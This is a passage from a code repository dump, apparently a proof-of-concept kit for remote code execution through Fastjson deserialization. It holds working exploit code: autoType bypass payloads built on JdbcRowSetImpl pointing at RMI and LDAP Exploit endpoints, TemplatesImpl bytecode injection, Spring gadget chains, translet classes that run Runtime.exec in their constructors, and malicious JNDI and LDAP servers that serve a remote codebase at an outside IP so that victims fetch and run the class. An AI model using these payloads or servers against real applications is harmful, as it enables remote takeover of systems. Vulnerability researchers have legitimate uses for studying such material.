"{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{\"dataSourceName\":\"rmi://127.0.0.1:1099/Exploit\",\"autoCommit\":true]} ";//1.2.43 21 | //1.2.42 22 | String payload2 = "{\"@type\":\"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 23 | " \"autoCommit\":true}"; 24 | //1.2.44 尝试 failed 25 | /* String payload = "{\"@type\":\"c\u0063\u006f\u006d.sun.rowset/JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 26 | " \"autoCommit\":true}"; 27 | String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:389/Exploit\"," + 28 | " \"autoCommit\":true}"; 29 | String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 30 | " \"autoCommit\":true}";*/ 31 | 32 | JSON.parse(payload); 33 | JSON.parse(payload2); 34 | JSON.parse(payload3); 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/person/Person.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/4/18. 5 | */ 6 | import java.io.Serializable; 7 | 8 | @SuppressWarnings("serial") 9 | public class Person implements Serializable{ 10 | private String name; 11 | private int age; 12 | public Person(){ 13 | System.out.println("in no param constructor"); 14 | } 15 | public Person(String str, int n){ 16 | System.out.println("Inside Person's Constructor"); 17 | name = str; 18 | age = n; 19 | } 20 | String getName(){ 21 | System.out.println("in getName"); 22 | return name; 23 | } 24 | void setName(String str){ 25 | System.out.println("in setname"); 26 | this.name = str; 27 | } 28 | 29 | void setAge(int age){ 30 | System.out.println("in setAge"); 31 | this.age = age; 32 | } 33 | int getAge(){ 34 | System.out.println("in getAge"); 35 | return age; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/person/Poc.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.Feature; 5 | import com.alibaba.fastjson.parser.ParserConfig; 6 | 7 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 8 | import org.apache.commons.io.IOUtils; 9 | import org.apache.commons.codec.binary.Base64; 10 | 11 | import java.io.ByteArrayOutputStream; 12 | import java.io.File; 13 | import java.io.FileInputStream; 14 | import java.io.IOException; 15 | 16 | /** 17 | * Created by web on 2017/4/29. 18 | */ 19 | public class Poc { 20 | 21 | public static String readClass(String cls){ 22 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 23 | try { 24 | IOUtils.copy(new FileInputStream(new File(cls)), bos); 25 | } catch (IOException e) { 26 | e.printStackTrace(); 27 | } 28 | return Base64.encodeBase64String(bos.toByteArray()); 29 | 30 | } 31 | 32 | public static void test_autoTypeDeny() throws Exception { 33 | ParserConfig config = new ParserConfig(); 34 | final String fileSeparator = System.getProperty("file.separator"); 35 | final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class"; 36 | String evilCode = readClass(evilClassPath); 37 | final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; 38 | String text1 = "{\"@type\":\"" + NASTY_CLASS + 39 | "\",\"_bytecodes\":[\""+evilCode+"\"]," + 40 | "'_name':'a.b'," + 41 | "'_tfactory':{ }," + 42 | "\"_outputProperties\":{ }}\n"; 43 | System.out.println(text1); 44 | //String personStr = "{'name':"+text1+",'age':19}"; 45 | //Person obj = JSON.parseObject(personStr, Person.class, config, Feature.SupportNonPublicField); 46 | Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); 47 | //assertEquals(Model.class, obj.getClass()); 48 | 49 | } 50 | 51 | public static void main(String args[]){ 52 | 53 | try { 54 | test_autoTypeDeny(); 55 | } catch (Exception e) { 56 | e.printStackTrace(); 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /src/main/java/person/Poc1.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/6/11. 5 | */ 6 | import com.alibaba.fastjson.JSON; 7 | import com.alibaba.fastjson.parser.Feature; 8 | import com.alibaba.fastjson.parser.ParserConfig; 9 | 10 | import org.apache.xalan.xsltc.trax.TemplatesImpl; 11 | import org.apache.commons.io.IOUtils; 12 | 13 | import org.apache.commons.codec.binary.Base64; 14 | 15 | import java.io.ByteArrayOutputStream; 16 | import java.io.File; 17 | import java.io.FileInputStream; 18 | import java.io.IOException; 19 | 20 | /** 21 | * Created by web on 2017/4/29. 22 | */ 23 | public class Poc1{ 24 | 25 | public static String readClass(String cls){ 26 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 27 | try { 28 | IOUtils.copy(new FileInputStream(new File(cls)), bos); 29 | } catch (IOException e) { 30 | e.printStackTrace(); 31 | } 32 | return Base64.encodeBase64String(bos.toByteArray()); 33 | 34 | } 35 | 36 | public static void test_autoTypeDeny() throws Exception { 37 | ParserConfig config = new ParserConfig(); 38 | final String fileSeparator = System.getProperty("file.separator"); 39 | //ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 40 | final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test1.class"; 41 | String evilCode = readClass(evilClassPath); 42 | final String NASTY_CLASS = "org.apache.xalan.xsltc.trax.TemplatesImpl"; 43 | String text1 = "{\"@type\":\"" + NASTY_CLASS + 44 | "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }," + 45 | "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"; 46 | 47 | System.out.println(text1); 48 | //String text2 = "Set[{\"@type\":\"org.springframework.aop.target.HotSwappableTargetSource\",\"static\":false,\"target\":{\"@type\":\"org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding\",\"className\":\"foo\",\"name\":\"foo\"}},{\"@type\":\"org.springframework.aop.target.HotSwappableTargetSource\"}]"; 49 | String text2 = "Set[{\"@type\":\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",\"beanFactory\":{\"@type\":\"org.springframework.jndi.support.SimpleJndiBeanFactory\",\"shareableResources\":[\"ldap://localhost:1389/obj\"]},\"adviceBeanName\":\"ldap://localhost:1389/obj\"},{\"@type\":\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",}] \n"; 50 | //String personStr = "{'name':"+text1+",'age':19}"; 51 | //Person obj = JSON.parseObject(personStr, Person.class, config, Feature.SupportNonPublicField); 52 | Object obj = JSON.parseObject(text2, Object.class, Feature.SupportNonPublicField); 53 | //Object obj = JSON.parseObject(text1, Object.class); 54 | //assertEquals(Model.class, obj.getClass()); 55 | 56 | } 57 | public static void test_serilize_deserialize(){ 58 | Person p = new Person("liming",12); 59 | p.setName("liming"); 60 | p.setAge(19); 61 | String jsonString = JSON.toJSONString(p); 62 | System.out.println(jsonString); 63 | Person p1 = JSON.parseObject(jsonString,Person.class); 64 | } 65 | public static void main(String args[]){ 66 | try { 67 | test_serilize_deserialize(); 68 | test_autoTypeDeny(); 69 | } catch (Exception e) { 70 | e.printStackTrace(); 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /src/main/java/person/SerializeToFlatFile.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/4/18. 5 | */ 6 | import java.io.FileInputStream; 7 | import java.io.FileOutputStream; 8 | import java.io.ObjectInputStream; 9 | import java.io.ObjectOutputStream; 10 | 11 | 12 | public class SerializeToFlatFile { 13 | public static void main(String[] args) { 14 | SerializeToFlatFile ser = new SerializeToFlatFile(); 15 | ser.savePerson(); 16 | ser.restorePerson(); 17 | } 18 | 19 | public void savePerson(){ 20 | Person myPerson = new Person("Jay",24); 21 | try { 22 | FileOutputStream fos = new FileOutputStream("myPerson.txt"); 23 | ObjectOutputStream oos = new ObjectOutputStream(fos); 24 | System.out.println("Person--Jay,24---Written"); 25 | System.out.println("Name is: "+myPerson.getName()); 26 | System.out.println("Age is: "+myPerson.getAge()); 27 | 28 | oos.writeObject(myPerson); 29 | oos.flush(); 30 | oos.close(); 31 | } catch (Exception e) { 32 | // TODO: handle exception 33 | e.printStackTrace(); 34 | } 35 | } 36 | 37 | public void restorePerson() { 38 | try { 39 | FileInputStream fis = new FileInputStream("myPerson.txt"); 40 | ObjectInputStream ois = new ObjectInputStream(fis); 41 | 42 | Person myPerson = (Person)ois.readObject(); 43 | System.out.println("\n--------------------\n"); 44 | System.out.println("Person--Jay,24---Restored"); 45 | System.out.println("Name is: "+myPerson.getName()); 46 | System.out.println("Age is: "+myPerson.getAge()); 47 | } catch (Exception e) { 48 | // TODO: handle exception 49 | e.printStackTrace(); 50 | } 51 | } 52 | } -------------------------------------------------------------------------------- /src/main/java/person/Test.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/4/29. 5 | */ 6 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 7 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 8 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 9 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 10 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 11 | 12 | import java.io.IOException; 13 | 14 | public class Test extends AbstractTranslet { 15 | public Test() throws IOException { 16 | Runtime.getRuntime().exec("calc"); 17 | } 18 | 19 | @Override 20 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { 21 | } 22 | 23 | @Override 24 | public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException { 25 | 26 | } 27 | 28 | public static void main(String[] args) throws Exception { 29 | Test t = new Test(); 30 | } 31 | } -------------------------------------------------------------------------------- /src/main/java/person/Test1.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/6/11. 5 | */ 6 | import org.apache.xalan.xsltc.runtime.AbstractTranslet; 7 | import org.apache.xalan.xsltc.DOM; 8 | import org.apache.xalan.xsltc.TransletException; 9 | import org.apache.xml.dtm.DTMAxisIterator; 10 | import org.apache.xml.serializer.SerializationHandler; 11 | 12 | import java.io.IOException; 13 | 14 | public class Test1 extends AbstractTranslet { 15 | public Test1() throws IOException { 16 | Runtime.getRuntime().exec("calc"); 17 | } 18 | 19 | @Override 20 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { 21 | } 22 | 23 | @Override 24 | public void transform(DOM document, org.apache.xml.serializer.SerializationHandler[] handlers) throws TransletException { 25 | 26 | } 27 | 28 | public static void main(String[] args) throws Exception { 29 | Test1 t = new Test1(); 30 | } 31 | } -------------------------------------------------------------------------------- /src/main/java/person/TestFastjson.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.Feature; 5 | import com.alibaba.fastjson.parser.ParserConfig; 6 | 7 | import java.io.IOException; 8 | import java.util.HashMap; 9 | import java.util.Map; 10 | 11 | import static java.lang.Runtime.*; 12 | 13 | /** 14 | * Created by liaoxinxi on 2017-6-5. 15 | */ 16 | public class TestFastjson { 17 | public static void main(String args[]){ 18 | ParserConfig config = new ParserConfig(); 19 | HashMap map = new HashMap(); 20 | map.put("1", new Integer(1)); 21 | map.put("2", new Integer(2)); 22 | try { 23 | map.put("3", getRuntime().exec("ping -n 3 192.168.3.103")); 24 | } catch (IOException e) { 25 | e.printStackTrace(); 26 | } 27 | System.out.println(JSON.toJSONString(map)); 28 | 29 | } 30 | 31 | } 32 | -------------------------------------------------------------------------------- /src/main/java/person/TestJNDI.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import javax.naming.*; 4 | import javax.naming.directory.DirContext; 5 | import javax.naming.directory.InitialDirContext; 6 | import java.util.Hashtable; 7 | 8 | 9 | /** 10 | * Created by liaoxinxi on 2017-9-5. 11 | */ 12 | public class TestJNDI { 13 | public static void testLdap(){ 14 | String url = "ldap://127.0.0.1:1389"; 15 | Hashtable env = new Hashtable(); 16 | env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.ldap.LdapCtxFactory"); 17 | env.put(Context.PROVIDER_URL, url); 18 | try{ 19 | DirContext dirContext = new InitialDirContext(env); 20 | System.out.println("connected"); 21 | System.out.println(dirContext.getEnvironment()); 22 | Reference e = (Reference) dirContext.lookup("e"); 23 | 24 | }catch(NameNotFoundException ex){ 25 | ex.printStackTrace(); 26 | }catch(Exception e){ 27 | e.printStackTrace(); 28 | } 29 | } 30 | public static void testRmi() throws NamingException { 31 | String url = "rmi://127.0.0.1:1099"; 32 | Hashtable env = new Hashtable(); 33 | env.put(Context.PROVIDER_URL, url); 34 | env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); 35 | Context context = new InitialContext(env); 36 | Object object = context.lookup("Exploit");//ok 37 | Object object1 = context.lookup("rmi://127.0.0.1/Exploit"); 38 | System.out.println("Object:" + object); 39 | } 40 | public static void main(String[] argv) throws NamingException { 41 | testRmi(); 42 | 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/person/server/JNDIServer.java: -------------------------------------------------------------------------------- 1 | package person.server; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | 5 | import javax.naming.NamingException; 6 | import javax.naming.Reference; 7 | import java.rmi.AlreadyBoundException; 8 | import java.rmi.RemoteException; 9 | import java.rmi.registry.LocateRegistry; 10 | import java.rmi.registry.Registry; 11 | 12 | /** 13 | * Created by liaoxinxi on 2017-11-6. 14 | */ 15 | 16 | public class JNDIServer { 17 | public static void start() throws 18 | AlreadyBoundException, RemoteException, NamingException { 19 | Registry registry = LocateRegistry.createRegistry(1099); 20 | //http://xxlegend.com/Exploit.class即可 21 | //factoryLocation 一定得是ip后带斜杠，这个斜杠少不得，少了的话到web服务器的请求就变成了GET / 而不是正常的GET /Exploit.class 22 | Reference reference = new Reference("Exploit", 23 | "Exploit","http://104.251.228.50/"); 24 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 25 | registry.bind("Exploit",referenceWrapper); 26 | 27 | } 28 | public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { 29 | start(); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /src/main/java/person/server/LdapServer.java: -------------------------------------------------------------------------------- 1 | package person.server; 2 | 3 | 4 | import java.net.InetAddress; 5 | import java.net.MalformedURLException; 6 | import java.net.URL; 7 | 8 | import javax.net.ServerSocketFactory; 9 | import javax.net.SocketFactory; 10 | import javax.net.ssl.SSLSocketFactory; 11 | 12 | import com.unboundid.ldap.listener.InMemoryDirectoryServer; 13 | import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; 14 | import com.unboundid.ldap.listener.InMemoryListenerConfig; 15 | import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; 16 | import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; 17 | import com.unboundid.ldap.sdk.Entry; 18 | import com.unboundid.ldap.sdk.LDAPException; 19 | import com.unboundid.ldap.sdk.LDAPResult; 20 | import com.unboundid.ldap.sdk.ResultCode; 21 | 22 | 23 | /** 24 | * LDAP server implementation returning JNDI references 25 | * 26 | * @author mbechler 27 | * 28 | */ 29 | public class LdapServer { 30 | 31 | private static final String LDAP_BASE = "dc=example,dc=com"; 32 | 33 | 34 | public static void main ( String[] args ) { 35 | int port = 1389; 36 | if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) { 37 | System.err.println(LdapServer.class.getSimpleName() + " []"); //$NON-NLS-1$ 38 | System.exit(-1); 39 | } 40 | else if ( args.length > 1 ) { 41 | port = Integer.parseInt(args[ 1 ]); 42 | } 43 | 44 | try { 45 | InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); 46 | config.setListenerConfigs(new InMemoryListenerConfig( 47 | "listen", //$NON-NLS-1$ 48 | InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ 49 | port, 50 | ServerSocketFactory.getDefault(), 51 | SocketFactory.getDefault(), 52 | (SSLSocketFactory) SSLSocketFactory.getDefault())); 53 | 54 | config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ]))); 55 | InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); 56 | System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ 57 | ds.startListening(); 58 | 59 | } 60 | catch ( Exception e ) { 61 | e.printStackTrace(); 62 | } 63 | } 64 | 65 | private static class OperationInterceptor extends InMemoryOperationInterceptor { 66 | 67 | private URL codebase; 68 | 69 | 70 | /** 71 | * 72 | */ 73 | public OperationInterceptor ( URL cb ) { 74 | this.codebase = cb; 75 | } 76 | 77 | 78 | /** 79 | * {@inheritDoc} 80 | * 81 | * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) 82 | */ 83 | @Override 84 | public void processSearchResult ( InMemoryInterceptedSearchResult result ) { 85 | String base = result.getRequest().getBaseDN(); 86 | Entry e = new Entry(base); 87 | try { 88 | sendResult(result, base, e); 89 | } 90 | catch ( Exception e1 ) { 91 | e1.printStackTrace(); 92 | } 93 | 94 | } 95 | 96 | 97 | protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { 98 | URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); 99 | System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); 100 | e.addAttribute("javaClassName", "Exploit"); 101 | String cbstring = this.codebase.toString(); 102 | int refPos = cbstring.indexOf('#'); 103 | if ( refPos > 0 ) { 104 | cbstring = cbstring.substring(0, refPos); 105 | } 106 | e.addAttribute("javaCodeBase", cbstring); 107 | e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ 108 | e.addAttribute("javaFactory", this.codebase.getRef()); 109 | result.sendSearchEntry(e); 110 | result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); 111 | } 112 | 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /target/classes/person/Exploit1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Exploit1.class -------------------------------------------------------------------------------- /target/classes/person/JdbcRowSetImplPoc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/JdbcRowSetImplPoc.class -------------------------------------------------------------------------------- /target/classes/person/Person.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Person.class -------------------------------------------------------------------------------- /target/classes/person/Poc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Poc.class -------------------------------------------------------------------------------- /target/classes/person/Poc1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Poc1.class -------------------------------------------------------------------------------- /target/classes/person/SerializeToFlatFile.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/SerializeToFlatFile.class -------------------------------------------------------------------------------- /target/classes/person/Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Test.class -------------------------------------------------------------------------------- /target/classes/person/Test1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Test1.class -------------------------------------------------------------------------------- /target/classes/person/TestFastjson.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/TestFastjson.class -------------------------------------------------------------------------------- /target/classes/person/TestJNDI.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/TestJNDI.class -------------------------------------------------------------------------------- /target/classes/person/server/JNDIServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/server/JNDIServer.class -------------------------------------------------------------------------------- /target/classes/person/server/LdapServer$OperationInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/server/LdapServer$OperationInterceptor.class -------------------------------------------------------------------------------- /target/classes/person/server/LdapServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/server/LdapServer.class -------------------------------------------------------------------------------- /target/fastjson-poc-1.0-SNAPSHOT-jar-with-dependencies.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/fastjson-poc-1.0-SNAPSHOT-jar-with-dependencies.jar -------------------------------------------------------------------------------- /target/fastjson-poc-1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/fastjson-poc-1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Tue Sep 05 16:32:58 CST 2017 3 | version=1.0-SNAPSHOT 4 | groupId=com.xxlengend 5 | artifactId=fastjson-poc 6 | -------------------------------------------------------------------------------- /target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst -------------------------------------------------------------------------------- /target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Person.java 2 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Poc.java 3 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Test1.java 4 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Poc1.java 5 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Test.java 6 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\server\LdapServer.java 7 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Poc2.java 8 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\SerializeToFlatFile.java 9 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\TestFastjson.java 10 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\exploit.java 11 | -------------------------------------------------------------------------------- /test.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | --------------------------------------------------------------------------------